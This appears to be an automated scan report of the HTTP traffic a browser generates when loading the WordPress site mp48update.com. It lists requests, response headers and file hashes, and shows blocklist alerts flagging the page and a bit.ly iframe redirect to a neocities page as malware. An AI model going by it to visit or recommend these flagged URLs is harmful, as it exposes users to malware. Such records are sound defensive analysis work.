Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: image/png
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,User-Agent,Accept-Encoding
last-modified: Thu, 18 Aug 2022 18:55:46 GMT
etag: "2aab4-5e68887791772"
accept-ranges: bytes
content-length: 174772
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 2084 x 887, 8-bit/color RGBA, interlaced\012- data
Size:   174772
Md5:    69b79ba5419444e9612670280cb95012
Sha1:   d7cde30d7c4fcec6bb7a05a5b8f682fb4e90c178
Sha256: 6119eff9db7a011706fe4ad16409a12db110887b6e10fcfe8c11b3d04d78a6c3
                                        
                                            GET /wp-includes/js/wp-emoji-release.min.js?ver=6.1.1 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Tue, 12 Apr 2022 05:56:23 GMT
etag: "48b9-5dc6eb878efc0-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 5085
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (15660)
Size:   5085
Md5:    3971154f76bf26e704b4910111d124ba
Sha1:   60dfcafe9593005b92cd0ce40f429b241ae3b287
Sha256: 549584b85b7433e767b71e774e5fcef37c40c19169e3979597b6ab7f8314b3c4
                                        
                                            GET /wp-includes/js/underscore.min.js?ver=1.13.4 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Wed, 02 Nov 2022 06:10:47 GMT
etag: "4991-5ec76b3a330de-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 7391
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (18798)
Size:   7391
Md5:    de5e02c3b0c35bf28fcb47de34df506c
Sha1:   3fcec2793b336cc28c4ce821bb3d5deb6b1fdd5f
Sha256: bcc14efa00c7330638dd6f8b1ff2deb7f2d1f95e8119b79dcc1e8b2ab48e52a8
                                        
                                            GET /wp-includes/js/comment-reply.min.js?ver=6.1.1 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Fri, 08 Apr 2022 20:07:18 GMT
etag: "ba5-5dc2a2438e980-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 1351
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (2946)
Size:   1351
Md5:    28214bc78b9edfcfbc9c7b651fb4f56c
Sha1:   fb0847abdb33dd943a2dcda4c4b905fb5cdd116c
Sha256: 11691bc1acc1f3a7ab8ef7c67fb720ca58fb72e52f510009f7b0cbc2589d45e0
                                        
                                            GET /wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=4173294bcf58591c4439ff8ccd792f1e HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Thu, 18 Aug 2022 08:30:17 GMT
etag: "a461-5e67fca94d299-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 9565
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1037)
Size:   9565
Md5:    33422379f70848351792792fa7494374
Sha1:   0dadfacfa1c1f1c170177b74cf9d9858e2432f3a
Sha256: 2ddbfd878a81dbc73e527304f764a4319eed9856bf1a263e871479402f874ce1
                                        
                                            GET /wp-content/plugins/td-cloud-library/assets/js/js_posts_autoload.min.js?ver=4173294bcf58591c4439ff8ccd792f1e HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Thu, 18 Aug 2022 08:30:17 GMT
etag: "14a0-5e67fca94f1d9-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
content-length: 2015
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (543)
Size:   2015
Md5:    5f176720c4e8f5ea71283392eee95494
Sha1:   7929bd41f34fbf4a55543ca8c52465ed1f538bb5
Sha256: 07b83c328ed5d172999cd7a9564bf5bf4ed50411828bef4b861a51829f0d1bbb

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /3bBYKfu HTTP/1.1 
Host: bit.ly
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         67.199.248.11
HTTP/2 301 Moved Permanently
content-type: text/html; charset=utf-8
                                        
server: nginx
date: Fri, 09 Dec 2022 04:41:57 GMT
content-length: 167
cache-control: private, max-age=90
location: https://piushtrivedi.neocities.org/hindi_astrology_google_gadget_Hindi4tech.html
set-cookie: _bit=mb94FV-875171194c1eab7a5e-00v; Domain=bit.ly; Expires=Wed, 07 Jun 2023 04:41:57 GMT
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text
Size:   167
Md5:    befa6180dbaf7cf834441f6e4cd6a36d
Sha1:   6c11dbacb3c743d5a8b88eaae9a1aebb57610882
Sha256: a0d67ef15647563ef0def0ce2570ae3db2d2d9000a9657e991f63fb0ce435379
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=103714
Date: Fri, 09 Dec 2022 04:41:57 GMT
Etag: "6391aeb7-118"
Expires: Sat, 10 Dec 2022 09:30:31 GMT
Last-Modified: Thu, 08 Dec 2022 09:30:31 GMT
Server: nginx
Content-Length: 280

                                        
                                            GET /s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBBc4.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://mp48update.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         216.58.207.227
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15920
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Dec 2022 19:33:56 GMT
expires: Thu, 07 Dec 2023 19:33:56 GMT
cache-control: public, max-age=31536000
age: 119281
last-modified: Wed, 11 May 2022 19:24:45 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15920, version 1.0\012- data
Size:   15920
Md5:    3a44e06eb954b96aa043227f3534189d
Sha1:   23cef6993ddb2b2979e8e7647fc3763694e2ba7d
Sha256: b019538234514166ec7665359d097403358f8a4c991901983922fb4d56989f1e
                                        
                                            GET /s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://mp48update.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         216.58.207.227
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15860
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Dec 2022 19:34:15 GMT
expires: Thu, 07 Dec 2023 19:34:15 GMT
cache-control: public, max-age=31536000
age: 119262
last-modified: Wed, 11 May 2022 19:24:42 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15860, version 1.0\012- data
Size:   15860
Md5:    e9f5aaf547f165386cd313b995dddd8e
Sha1:   acdef5603c2387b0e5bffd744b679a24a8bc1968
Sha256: f5aebdfea35d1e7656ef4acc5db1f243209755ae3300943ef8fc6280f363c860
                                        
                                            GET /s/ptserif/v17/EJRVQgYoZZY2vCFuvAFWzr8.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://mp48update.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         216.58.207.227
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 32900
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Dec 2022 19:41:39 GMT
expires: Thu, 07 Dec 2023 19:41:39 GMT
cache-control: public, max-age=31536000
age: 118818
last-modified: Wed, 27 Apr 2022 15:44:11 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 32900, version 1.0\012- data
Size:   32900
Md5:    fda3323314d895ae39de612559f6fad9
Sha1:   644dbb14f599920fdc8f8260b6e67bd1f8770e89
Sha256: d355afb9705c3f8651f6a1f813b4670b758d59a17783830f534e7a8839c5b666
                                        
                                            GET /s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://mp48update.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         216.58.207.227
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15744
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Dec 2022 19:33:54 GMT
expires: Thu, 07 Dec 2023 19:33:54 GMT
cache-control: public, max-age=31536000
age: 119283
last-modified: Wed, 11 May 2022 19:24:48 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15744, version 1.0\012- data
Size:   15744
Md5:    15d9f621c3bd1599f0169dcf0bd5e63e
Sha1:   7ca9c5967f3bb8bffeab24b639b49c1e7d03fa52
Sha256: f6734f8177112c0839b961f96d813fcb189d81b60e96c33278c1983b6f419615
                                        
                                            GET / HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
date: Fri, 09 Dec 2022 04:41:55 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
cache-control: max-age=600
expires: Fri, 09 Dec 2022 04:51:55 GMT
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   110426
Md5:    19cd5db80d33fcb24fbb71676d39960e
Sha1:   1d94a8e05acc4ec01d30a13b6ba9906fad8dbd0b
Sha256: a40a45b46f992b36e880c952a4421845d3c80ba9b614c94d3dbcd11bfb9ca093

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/worksans/v18/QGYsz_wNahGAdqQ43Rh_fKDp.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://mp48update.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         216.58.207.227
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 47728
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 06 Dec 2022 19:22:23 GMT
expires: Wed, 06 Dec 2023 19:22:23 GMT
cache-control: public, max-age=31536000
age: 206374
last-modified: Tue, 23 Aug 2022 17:55:22 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 47728, version 1.0\012- data
Size:   47728
Md5:    b1581ddd77372ceb06eb14adfd1bea07
Sha1:   1a3b0fc96fa73b808aa1f91f122a3c9bdcf93ee8
Sha256: 97e82d8eac8d106b28abf1b716982c40c06fffe49cc2f34cd1c299266745ef73
                                        
                                            GET /s/ptserif/v17/EJRSQgYoZZY2vCFuvAnt66qSVys.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://mp48update.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         216.58.207.227
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 29492
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Dec 2022 19:39:36 GMT
expires: Thu, 07 Dec 2023 19:39:36 GMT
cache-control: public, max-age=31536000
age: 118942
last-modified: Wed, 27 Apr 2022 16:29:15 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 29492, version 1.0\012- data
Size:   29492
Md5:    1ef64f017b272dc9baf01a7e6c1f2c30
Sha1:   3a2cc0c846c0c5af065eee0f45edde9c02ec596f
Sha256: 7f9694a5641741d04e1c98eb1011059826aa5feb34e47d2b2f95bdb47cb0c2f5
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 116
Cache-Control: max-age=146695
Date: Fri, 09 Dec 2022 04:41:58 GMT
Etag: "6392562a-1d7"
Expires: Sat, 10 Dec 2022 21:26:53 GMT
Last-Modified: Thu, 08 Dec 2022 21:24:58 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /s/opensans/v34/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://mp48update.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         216.58.207.227
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 44856
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Mon, 05 Dec 2022 18:52:41 GMT
expires: Tue, 05 Dec 2023 18:52:41 GMT
cache-control: public, max-age=31536000
age: 294557
last-modified: Mon, 15 Aug 2022 18:20:18 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 44856, version 1.0\012- data
Size:   44856
Md5:    565ce506190ad3af920b40baf1794cec
Sha1:   ad3cba5d06100e09449a864d3b5e58403b478b3d
Sha256: 8778e9af2422858d7052ff9a0f3c12c08ae976bdd6e0316db144cd5579cd97db
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:58 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "B799126E6B173F7383788EDB39276FEED95964BFC0A3A710589E34BD0C5CDA7B"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9649
Expires: Fri, 09 Dec 2022 07:22:47 GMT
Date: Fri, 09 Dec 2022 04:41:58 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 1
Cache-Control: max-age=103714
Date: Fri, 09 Dec 2022 04:41:58 GMT
